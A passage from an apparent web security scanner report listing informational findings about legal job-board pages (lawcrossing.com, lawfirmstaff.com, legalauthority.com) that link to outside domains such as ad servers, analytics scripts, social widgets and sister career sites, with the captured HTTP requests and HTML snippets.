http://www.lawcrossing.com/?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\

The response contains the following links to other domains:

http://c16.statcounter.com/counter.php?sc_project=1646201&java=0&security=b657086a&invisible=1
http://employers.employmentcrossing.com/?compid=2
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://images.employmentcrossing.com/employment/articleimages/harrison_small.jpg
http://images.hound.com/logo_right.jpg
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=165&n=a16c4656&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=204&source=_blank&n=ab00dbd7
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=289&n=ada8b533&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=320&n=ac78da0c&
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a16c4656&cb=558459
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ab00dbd7&cb=554147
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ac78da0c&cb=652599
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ada8b533&cb=512549
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://twitter.com/Law_Crossing
http://twitter.com/aharrisonbarnes
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/
http://www.aharrisonbarnes.com/hb-course/
http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js
http://www.attorneyresume.com/
http://www.bcgsearch.com/
http://www.bcgsearch.com/searchresults.php?key=OP3V61427
http://www.employmentresearchinstitute.com/
http://www.facebook.com/pages/LawCrossing/308665573370?ref=search&sid=1742093369.4022958212..1
http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FLawCrossing%2F308665573370&width=265&colorscheme=light&connections=100&stream=true&header=true&height=587
http://www.google.co.in/ig/directory?hl=en&type=gadgets&url=www.lawcrossing.com/lawcrossing-google.xml
http://www.hound.com/
http://www.jdjournal.com/
http://www.jdjournal.com/images/jdjlogo.jpg
http://www.jdjournal.com/script/ajax.js
http://www.jdjournal.com/script/functions.js
http://www.lateralattorneyreport.com/
http://www.legalauthority.com/
http://www.legalrecruitersubmitter.com/
http://www.resumeboomer.com/
http://www.statcounter.com/
http://www.statcounter.com/counter/frames.js
https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a16c4656&cb=558459' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=165&n=a16c4656&' border='0' alt='' /></a>
...[SNIP]...
<td align="right" class="articletitle"><a href="http://employers.employmentcrossing.com/?compid=2" style="color:#3d7e18;"><strong>
...[SNIP]...
<td width="120" class="imgtext" style="padding-left:0px;" valign="top">
<img src="http://images.employmentcrossing.com/employment/articleimages/harrison_small.jpg" width="109" height="123" border="0" class="articleimg" alt="Our CEO A Harrison Barnes" title="Our CEO A Harrison Barnes">
<br>
...[SNIP]...
<br>
<a href="http://twitter.com/aharrisonbarnes" target="_blank"><img src="http://www.lawcrossing.com/images/twitter_followme.jpg" border="0" alt="Follow Me on Twitter" title="Follow Me on Twitter">
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<td width="100" valign="top"><a href="http://www.jdjournal.com" target="_blank"><img src="http://www.lawcrossing.com/images/articleimages/jdjournallogo_sm.jpg" width="89" height="21" border="0" class="articleimg" alt="JD Journal">
...[SNIP]...
<br><a href="http://www.jdjournal.com" target="_blank"><img src="http://www.lawcrossing.com/images/articleimages/jdjournallogo_sm.jpg" width="89" height="21" border="0" class="articleimg" alt="JD Journal" title="JD Journal">
...[SNIP]...
<td width="100" valign="top" class="imgtext"><a href="http://www.bcgsearch.com/" target="_blank"><img src="http://www.lawcrossing.com/images/articleimages/bcglogo_sm.jpg" width="84" height="48" border="0" class="articleimg" alt="BCG Attorney Search" title="BCG Attorney Search">
...[SNIP]...
<td width="100" valign="top" class="imgtext"><a href="http://www.bcgsearch.com/" target="_blank"><img src="http://www.lawcrossing.com/images/articleimages/bcglogo_sm.jpg" width="84" height="48" border="0" class="articleimg" alt="BCG Attorney Search" title="BCG Attorney Search">
...[SNIP]...
<td height="50" align="center" class="bgwhite"><a href="http://www.google.co.in/ig/directory?hl=en&type=gadgets&url=www.lawcrossing.com/lawcrossing-google.xml" target="_blank"><img src="http://www.lawcrossing.com/images/bt_addtoigoogle.gif" width="203" height="37" alt="Add to iGoogle" title="Add to iGoogle" border="0">
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...
<noscript>
       <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="262" height="210" id="map" align="middle">
           <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<img src="http://www.lawcrossing.com/images/arrowwhite_next.gif" width="4" height="7" border="0" alt="" align="absmiddle">  <a href="http://www.lateralattorneyreport.com/" target="_blank">Lateral Attorney Report<br>
...[SNIP]...
<td width="100%"><a href="http://www.facebook.com/pages/LawCrossing/308665573370?ref=search&sid=1742093369.4022958212..1" target="_blank"><img src="http://www.lawcrossing.com/images/facebook.jpg" width="95" height="21" border="0" alt="Facebook" title="Facebook" align="absmiddle"></a> <a href="http://twitter.com/Law_Crossing" target="_blank"><img src="http://www.lawcrossing.com/images/twitter.jpg" width="163" height="21" border="0" alt="Twitter" title="Twitter" align="absmiddle">
...[SNIP]...
<td width="100%"><a href="http://www.bcgsearch.com/" target="_blank"><img src="http://www.lawcrossing.com/images/banner/bcg_265x90.jpg" width="265" height="90" border="0" alt="BCG Attorney Search" title="BCG Attorney Search">
...[SNIP]...
<td colspan="2" align="center"><a href="http://www.hound.com/" target="_blank"><img src="http://images.hound.com/logo_right.jpg" alt="" width="94" height="100" border="0"></a>
...[SNIP]...
<td>
<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FLawCrossing%2F308665573370&width=265&colorscheme=light&connections=100&stream=true&header=true&height=587" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:265px; height:587px;" allowTransparency="true"></iframe>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ac78da0c&cb=652599' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=320&n=ac78da0c&' border='0' alt='' /></a>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ada8b533&cb=512549' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=289&n=ada8b533&' border='0' alt='' /></a>
...[SNIP]...
<td><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<td width="100%" align="center" bgcolor="#f7f7f7"><img src="http://www.jdjournal.com/images/jdjlogo.jpg" width="190" height="54" border="0" alt="JDJournal"></td>
...[SNIP]...
<br><a href="http://www.bcgsearch.com/" target="_blank"><img src="http://www.lawcrossing.com/images/bcglogo.jpg" width="66" height="32" border="0" alt="BCG Attorney Search">
...[SNIP]...
<div align="right"><a href="http://www.bcgsearch.com/searchresults.php?key=OP3V61427" target="_blank"><strong>
...[SNIP]...

           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ab00dbd7&cb=554147' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=204&source=_blank&n=ab00dbd7' border='0' alt='' /></a>
...[SNIP]...
</a>  | 
<a href="http://www.attorneyresume.com/" target="_blank">Resume Writing Service</a>  | 
<a href="http://www.resumeboomer.com/" target="_blank">Post Resume</a>  | 
<a href="http://www.legalrecruitersubmitter.com/" target="_blank">Send Resume</a>  | 
<a href="http://www.legalauthority.com/" target="_blank">Resume Distribution</a>  | 
<a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a>  | 
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">Job Search Tips</a>
...[SNIP]...
<br>
<a href="http://employers.employmentcrossing.com/?compid=2">Employers / Recruiters - Post Jobs</a>
...[SNIP]...
</a>  | 
<a href="http://www.jdjournal.com/" target="_blank">Law Firm News</a>  | 
<a href="http://www.bcgsearch.com" target="_blank">Legal Recruiter</a>
...[SNIP]...
<td height="80" align="center"><a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://www.lawcrossing.com/images/logo_es.jpg" width="163" height="50" border="0" alt="Employment Research Institute" title="Employment Research Institute">
...[SNIP]...
</script>

           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script><noscript><a href="http://www.statcounter.com/" target="_blank"><img src="http://c16.statcounter.com/counter.php?sc_project=1646201&java=0&security=b657086a&invisible=1" alt="web statistics" border="0"></a>
...[SNIP]...

14.14. http://www.lawfirmstaff.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawfirmstaff.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.lawfirmstaff.com/?utm_source=JDJournal&utm_medium=Banner&utm_campaign=LFS-NeedaContact125x125\

The response contains the following links to other domains:

http://twitter.com/aharrisonbarnes
http://www.100kcrossing.com/
http://www.accountingcrossing.com/
http://www.accountmanagementcrossing.com/
http://www.actuarialcrossing.com/
http://www.admincrossing.com/
http://www.advertisingcrossing.com/
http://www.aerospacecrossing.com/
http://www.agriculturalcrossing.com/
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/
http://www.aharrisonbarnes.com/hb-course/
http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js
http://www.architecturecrossing.com/
http://www.attorneyresume.com/
http://www.auditorcrossing.com/
http://www.automotivecrossing.com/
http://www.aviationcrossing.com/
http://www.bcgsearch.com/
http://www.bilingualcrossing.com/
http://www.biotechcrossing.com/
http://www.bluecollarcrossing.com/
http://www.businessanalystcrossing.com/
http://www.businessdevelopmentcrossing.com/
http://www.callcentercrossing.com/
http://www.chefcrossing.com/
http://www.civilengineeringcrossing.com/
http://www.clevelcrossing.com/
http://www.clinicalresearchcrossing.com/
http://www.compliancecrossing.com/
http://www.computeraideddesigncrossing.com/
http://www.constructioncrossing.com/
http://www.consultingcrossing.com/
http://www.contractmanagementcrossing.com/
http://www.counselingcrossing.com/
http://www.cpluspluscrossing.com/
http://www.customerservicecrossing.com/
http://www.dbacrossing.com/
http://www.dentalcrossing.com/
http://www.designingcrossing.com/
http://www.diversitycrossing.com/
http://www.dotnetcrossing.com/
http://www.ecommercecrossing.com/
http://www.edfed.com/
http://www.editingcrossing.com/
http://www.educationcrossing.com/
http://www.employmentauthority.com/
http://www.employmentcrossing.com/
http://www.employmentresearchinstitute.com/
http://www.energycrossing.com/
http://www.engineeringcrossing.com/
http://www.entrylevelcrossing.com/
http://www.environmentalcrossing.com/
http://www.environmentalsafetyhealthcrossing.com/
http://www.erpcrossing.com/
http://www.execcrossing.com/
http://www.facilitiescrossing.com/
http://www.financialservicescrossing.com/
http://www.foodservicescrossing.com/
http://www.fundraisingcrossing.com/
http://www.giscrossing.com/
http://www.google-analytics.com/urchin.js
http://www.governmentcrossing.com/
http://www.graduateschoolloans.com/
http://www.healthcarecrossing.com/
http://www.helpdeskcrossing.com/
http://www.hospitalitycrossing.com/
http://www.hound.com/
http://www.hrcrossing.com/
http://www.hvaccrossing.com/
http://www.informationtechnologycrossing.com/
http://www.insurcrossing.com/
http://www.intellectualpropertycrossing.com/
http://www.internshipcrossing.com/
http://www.j2eecrossing.com/
http://www.jd2b.com/
http://www.jdjournal.com/
http://www.journalismcrossing.com/
http://www.judged.com/
http://www.lawcrossing.com/
http://www.lawschoolloanreport.org/
http://www.lawschoolloans.com/
http://www.legalauthority.com/
http://www.legalauthorityfinancial.com/
http://www.logisticscrossing.com/
http://www.managercrossing.com/
http://www.manufacturingcrossing.com/
http://www.marketingcrossing.com/
http://www.mediajobcrossing.com/
http://www.medicalschoolloans.com/
http://www.militarycrossing.com/
http://www.nursingcrossing.com/
http://www.occupationaltherapycrossing.com/
http://www.operationscrossing.com/
http://www.parttimecrossing.com/
http://www.pharmaceuticalcrossing.com/
http://www.physicalsecuritycrossing.com/
http://www.physicaltherapycrossing.com/
http://www.planningcrossing.com/
http://www.postdoctoralfellowcrossing.com/
http://www.prcrossing.com/
http://www.preferredresumes.com/
http://www.procurementcrossing.com/
http://www.productmanagercrossing.com/
http://www.projectmanagementcrossing.com/
http://www.publicinterestcrossing.com/
http://www.publishingcrossing.com/
http://www.purchasingcrossing.com/
http://www.qaqccrossing.com/
http://www.radiocrossing.com/
http://www.realestateandlandcrossing.com/
http://www.recruitingcrossing.com/
http://www.researchingcrossing.com/
http://www.resumeboomer.com/
http://www.retailcrossing.com/
http://www.sciencescrossing.com/
http://www.scientistcrossing.com/
http://www.sellingcrossing.com/
http://www.sqlcrossing.com/
http://www.teenagercrossing.com/
http://www.telecomcrossing.com/
http://www.tradingcrossing.com/
http://www.trainingcrossing.com/
http://www.transportationcrossing.com/
http://www.travelingcrossing.com/
http://www.truckingcrossing.com/
http://www.tvcrossing.com/
http://www.underwritingcrossing.com/
http://www.veterinarycrossing.com/
http://www.volunteercrossing.com/
http://www.workathomecrossing.com/
http://www.writingcrossing.com/
https://www.lawschoolloans.com/lslprivateloan_application.php

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=LFS-NeedaContact125x125\ HTTP/1.1
Host: www.lawfirmstaff.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3ondnk2d7pvm3vd81q243396b6; path=/; domain=www.lawfirmstaff.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27468

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Law Firm Placement, Legal Staff, Law Firm Jobs, Legal Placement - Law Firm S
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Law Firm Staff Jobs RSS Feed" href="http://www.lawfirmstaff.com/lfsrssjobs.php" target="_blank" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<br>
<a href="http://twitter.com/aharrisonbarnes" target="_blank"><img src="http://www.lawfirmstaff.com/images/twitter_followme.jpg" border="0" alt="Follow Me on Twitter">
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind’s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind’s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<br><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<div>
       <a href="http://www.aharrisonbarnes.com/" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0" >
<a href="http://www.lawcrossing.com" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.bcgsearch.com" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.attorneyresume.com" target="_blank"><font color="#9e2f40">
...[SNIP]...
<br>
<a href="https://www.lawschoolloans.com/lslprivateloan_application.php" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.legalauthority.com" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
       <a href="http://www.jdjournal.com/" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.resumeboomer.com/" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank"><font color="#9e2f40">
...[SNIP]...
<center><a href="http://www.employmentresearchinstitute.com" target="_blank"><img src="http://www.lawfirmstaff.com/images/logo_es.gif" alt="Employment Research Institute" border="0">
...[SNIP]...
</strong>
       <a href="http://www.100kcrossing.com" target="_blank"> 100KCrossing</a>| <a href="http://www.AccountingCrossing.com" target="_blank"> AccountingCrossing</a>| <a href="http://www.accountmanagementcrossing.com" target="_blank"> AccountManagementCrossing</a>| <a href="http://www.ActuarialCrossing.com" target="_blank"> ActuarialCrossing</a>| <a href="http://www.AdminCrossing.com" target="_blank"> AdminCrossing</a>| <a href="http://www.advertisingcrossing.com" target="_blank"> AdvertisingCrossing</a>| <a href="http://www.AerospaceCrossing.com" target="_blank"> AerospaceCrossing</a>| <a href="http://www.AgriculturalCrossing.com" target="_blank"> AgriculturalCrossing</a>| <a href="http://www.ArchitectureCrossing.com" target="_blank"> ArchitectureCrossing</a>| <a href="http://www.attorneyresume.com" target="_blank"> Attorney Resume</a>| <a href="http://www.AuditorCrossing.com" target="_blank"> AuditorCrossing</a>| <a href="http://www.AutomotiveCrossing.com" target="_blank"> AutomotiveCrossing</a>| <a href="http://www.AviationCrossing.com" target="_blank"> AviationCrossing</a>| <a href="http://www.bcgsearch.com" target="_blank"> BCG Attorney Search</a>| <a href="http://www.BilingualCrossing.com" target="_blank"> BilingualCrossing</a>| <a href="http://www.BioTechCrossing.com" target="_blank"> BiotechCrossing</a>| <a href="http://www.BlueCollarCrossing.com" target="_blank"> BlueCollarCrossing</a>| <a href="http://www.businessanalystcrossing.com" target="_blank"> BusinessAnalystCrossing</a>| <a href="http://www.BusinessDevelopmentCrossing.com" target="_blank"> BusinessDevelopmentCrossing</a>| <a href="http://www.CallCenterCrossing.com" target="_blank"> CallCenterCrossing</a>| <a href="http://www.ChefCrossing.com" target="_blank"> ChefCrossing</a>| <a href="http://www.CivilEngineeringCrossing.com" target="_blank"> CivilEngineeringCrossing</a>| <a href="http://www.CLevelCrossing.com" target="_blank"> CLevelCrossing</a>| <a href="http://www.ClinicalResearchCrossing.com" target="_blank"> ClinicalResearchCrossing</a>| <a href="http://www.ComplianceCrossing.com" target="_blank"> ComplianceCrossing</a>| <a href="http://www.ComputerAidedDesignCrossing.com" target="_blank"> ComputerAidedDesignCrossing</a>| <a href="http://www.ConstructionCrossing.com" target="_blank"> ConstructionCrossing</a>| <a href="http://www.ConsultingCrossing.com" target="_blank"> ConsultingCrossing</a>| <a href="http://www.ContractManagementCrossing.com" target="_blank"> ContractManagementCrossing</a>| <a href="http://www.CounselingCrossing.com" target="_blank"> CounselingCrossing</a>| <a href="http://www.CPlusPlusCrossing.com" target="_blank"> CPlusPlusCrossing</a>| <a href="http://www.CustomerServiceCrossing.com" target="_blank"> CustomerServiceCrossing</a>| <a href="http://www.DBACrossing.com" target="_blank"> DBACrossing</a>| <a href="http://www.DentalCrossing.com" target="_blank"> DentalCrossing</a>| <a href="http://www.DesigningCrossing.com" target="_blank"> DesigningCrossing</a>| <a href="http://www.DiversityCrossing.com" target="_blank"> DiversityCrossing</a>| <a href="http://www.DotNetCrossing.com" target="_blank"> DotNetCrossing</a>| <a href="http://www.ECommerceCrossing.com" target="_blank"> ECommerceCrossing</a>| <a href="http://www.edfed.com" target="_blank"> EdFed</a>| <a href="http://www.EditingCrossing.com" target="_blank"> EditingCrossing</a>| <a href="http://www.EducationCrossing.com" target="_blank"> EducationCrossing</a>| <a href="http://www.EmploymentAuthority.com" target="_blank"> EmploymentAuthority</a>| <a href="http://www.employmentcrossing.com" target="_blank"> EmploymentCrossing</a>| <a href="http://www.EnergyCrossing.com" target="_blank"> EnergyCrossing</a>| <a href="http://www.EngineeringCrossing.com" target="_blank"> EngineeringCrossing</a>| <a href="http://www.EntryLevelCrossing.com" target="_blank"> EntryLevelCrossing</a>| <a href="http://www.EnvironmentalCrossing.com" target="_blank"> EnvironmentalCrossing</a>| <a href="http://www.EnvironmentalSafetyHealthCrossing.com" target="_blank"> EnvironmentalSafetyHealthCrossing</a>| <a href="http://www.erpcrossing.com" target="_blank"> SAPCrossing</a>| <a href="http://www.ExecCrossing.com" target="_blank"> ExecCrossing</a>| <a href="http://www.FacilitiesCrossing.com" target="_blank"> FacilitiesCrossing</a>| <a href="http://www.FinancialServicesCrossing.com" target="_blank"> FinancialServicesCrossing</a>| <a href="http://www.FoodServicesCrossing.com" target="_blank"> FoodServicesCrossing</a>| <a href="http://www.FundraisingCrossing.com" target="_blank"> FundraisingCrossing</a>| <a href="http://www.GISCrossing.com" target="_blank"> GISCrossing</a>| <a href="http://www.GovernmentCrossing.com" target="_blank"> GovernmentCrossing</a>| <a href="http://www.graduateschoolloans.com" target="_blank"> Graduate School Loans</a>| <a href="http://www.HealthcareCrossing.com" target="_blank"> HealthcareCrossing</a>| <a href="http://www.HelpDeskCrossing.com" target="_blank"> HelpDeskCrossing</a>| <a href="http://www.HospitalityCrossing.com" target="_blank"> HospitalityCrossing</a>| <a href="http://www.hound.com" target="_blank"> Hound</a>| <a href="http://www.hrcrossing.com" target="_blank"> HRCrossing</a>| <a href="http://www.HVACCrossing.com" target="_blank"> HVACCrossing</a>| <a href="http://www.InformationTechnologyCrossing.com" target="_blank"> InformationTechnologyCrossing</a>| <a href="http://www.insurcrossing.com" target="_blank"> InsurCrossing</a>| <a href="http://www.IntellectualPropertyCrossing.com" target="_blank"> IntellectualPropertyCrossing</a>| <a href="http://www.InternshipCrossing.com" target="_blank"> InternshipCrossing</a>| <a href="http://www.J2EECrossing.com" target="_blank"> J2EECrossing</a>| <a href="http://www.jd2b.com" target="_blank"> JD2B</a>| <a href="http://www.jdjournal.com" target="_blank"> JDJournal</a>| <a href="http://www.JournalismCrossing.com" target="_blank"> JournalismCrossing</a>| <a href="http://www.judged.com" target="_blank"> Judged</a>| <a href="http://www.lawcrossing.com" target="_blank"> LawCrossing</a>| <a href="http://www.lawschoolloanreport.org" target="_blank"> Law School Loan Report</a>| <a href="http://www.lawschoolloans.com" target="_blank"> Law School Loans</a>| <a href="http://www.legalauthority.com" target="_blank"> Legal Authority</a>| <a href="http://www.LegalAuthorityFinancial.com" target="_blank"> Legal Authority Financial</a>| <a href="http://www.LogisticsCrossing.com" target="_blank"> LogisticsCrossing</a>| <a href="http://www.ManagerCrossing.com" target="_blank"> ManagerCrossing</a>| <a href="http://www.ManufacturingCrossing.com" target="_blank"> ManufacturingCrossing</a>| <a href="http://www.marketingcrossing.com" target="_blank"> MarketingCrossing</a>| <a href="http://www.MediaJobCrossing.com" target="_blank"> MediaJobCrossing</a>| <a href="http://www.medicalschoolloans.com" target="_blank"> Medical School Loans</a>| <a href="http://www.MilitaryCrossing.com" target="_blank"> MilitaryCrossing</a>| <a href="http://www.NursingCrossing.com" target="_blank"> NursingCrossing</a>| <a href="http://www.OccupationalTherapyCrossing.com" target="_blank"> OccupationalTherapyCrossing</a>| <a href="http://www.operationscrossing.com" target="_blank"> OperationsCrossing</a>| <a href="http://www.PartTimeCrossing.com" target="_blank"> PartTimeCrossing</a>| <a href="http://www.PharmaceuticalCrossing.com" target="_blank"> PharmaceuticalCrossing</a>| <a href="http://www.PhysicalSecurityCrossing.com" target="_blank"> PhysicalSecurityCrossing</a>| <a href="http://www.PhysicalTherapyCrossing.com" target="_blank"> PhysicalTherapyCrossing</a>| <a href="http://www.PlanningCrossing.com" target="_blank"> PlanningCrossing</a>| <a href="http://www.PostDoctoralFellowCrossing.com" target="_blank"> PostdoctoralFellowCrossing</a>| <a href="http://www.prcrossing.com" target="_blank"> PRCrossing</a>| <a href="http://www.preferredresumes.com" target="_blank"> Preferred Resumes</a>| <a href="http://www.ProcurementCrossing.com" target="_blank"> ProcurementCrossing</a>| <a href="http://www.ProductManagerCrossing.com" target="_blank"> ProductManagerCrossing</a>| <a href="http://www.projectmanagementcrossing.com" target="_blank"> ProjectManagementCrossing</a>| <a href="http://www.PublicInterestCrossing.com" target="_blank"> PublicInterestCrossing</a>| <a href="http://www.PublishingCrossing.com" target="_blank"> PublishingCrossing</a>| <a href="http://www.PurchasingCrossing.com" target="_blank"> PurchasingCrossing</a>| <a href="http://www.qaqccrossing.com" target="_blank"> QAQCCrossing</a>| <a href="http://www.RadioCrossing.com" target="_blank"> RadioCrossing</a>| <a href="http://www.realestateandlandcrossing.com" target="_blank"> RealEstateAndLandCrossing</a>| <a href="http://www.RecruitingCrossing.com" target="_blank"> RecruitingCrossing</a>| <a href="http://www.ResearchingCrossing.com" target="_blank"> ResearchingCrossing</a>| <a href="http://www.RetailCrossing.com" target="_blank"> RetailCrossing</a>| <a href="http://www.sciencescrossing.com" target="_blank"> SciencesCrossing</a>| <a href="http://www.ScientistCrossing.com" target="_blank"> ScientistCrossing</a>| <a href="http://www.sellingcrossing.com" target="_blank"> SellingCrossing</a>| <a href="http://www.SQLCrossing.com" target="_blank"> SQLCrossing</a>| <a href="http://www.TeenagerCrossing.com" target="_blank"> TeenagerCrossing</a>| <a href="http://www.TelecomCrossing.com" target="_blank"> TelecomCrossing</a>| <a href="http://www.TradingCrossing.com" target="_blank"> TradingCrossing</a>| <a href="http://www.TrainingCrossing.com" target="_blank"> TrainingCrossing</a>| <a href="http://www.TransportationCrossing.com" target="_blank"> TransportationCrossing</a>| <a href="http://www.TravelingCrossing.com" target="_blank"> TravelingCrossing</a>| <a href="http://www.TruckingCrossing.com" target="_blank"> TruckingCrossing</a>| <a href="http://www.TVCrossing.com" target="_blank"> TVCrossing</a>| <a href="http://www.UnderWritingCrossing.com" target="_blank"> UnderwritingCrossing</a>| <a href="http://www.VeterinaryCrossing.com" target="_blank"> VeterinaryCrossing</a>| <a href="http://www.VolunteerCrossing.com" target="_blank"> VolunteerCrossing</a>| <a href="http://www.WorkAtHomeCrossing.com" target="_blank"> WorkAtHomeCrossing</a>| <a href="http://www.WritingCrossing.com" target="_blank"> WritingCrossing</a>
...[SNIP]...

14.15. http://www.legalauthority.com/signup.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.legalauthority.com
Path:	/signup.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.legalauthority.com/signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x300\

The response contains the following links to other domains:

http://srvr19.pdcsrvr.com/vsa/callagent.php?cid=1
http://www.100kcrossing.com/
http://www.accountingcrossing.com/
